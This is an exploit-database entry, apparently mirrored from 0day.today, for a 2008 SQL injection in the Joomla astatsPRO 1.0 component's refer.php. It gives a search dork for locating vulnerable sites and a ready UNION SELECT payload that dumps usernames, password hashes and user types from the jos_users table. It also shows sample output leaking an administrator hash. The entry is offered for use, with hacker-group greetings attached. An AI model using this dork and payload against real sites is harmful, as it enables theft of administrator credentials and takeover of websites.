Joomla Component astatsPRO 1.0 refer.php SQL Injection Vulnerability

2008-02-18T00:00:00
ID 1337DAY-ID-2657
Type zdt
Reporter ka0x
Modified 2008-02-18T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
Joomla Component astatsPRO 1.0 refer.php SQL Injection Vulnerability
====================================================================


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Joomla Component astatsPRO Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

## bug found by ka0x
## D.O.M TEAM 2008
## we are: ka0x, an0de, xarnuz
## http://www.domlabs.org/
## from spain

d0rk: allinurl: "com_astatspro"

PoC: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),concat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*


Look at the code of the page:

<HTML>
<HEAD>

    <TITLE>302 Moved</TITLE>

</HEAD>
<BODY BGCOLOR=#FFFFFF>

    <H1>302 Moved</H1>
    The document has moved <A HREF="admin:c9cb9115e90580e14a0407ed1fcf8039:Super Administrator">here</A>.


</BODY>
</HTML>

greets: ssh-2, phnx, nettoxic, jns07, her0, JosS, Plexinium Team, FaLENcE, Hendrix,
        Piker, you_kn0w, Celciuz, Lady_Lara, The Shredder, RedHack Team, zickox, Furtivo.
       

__EOF__





#  0day.today [2018-04-12]  #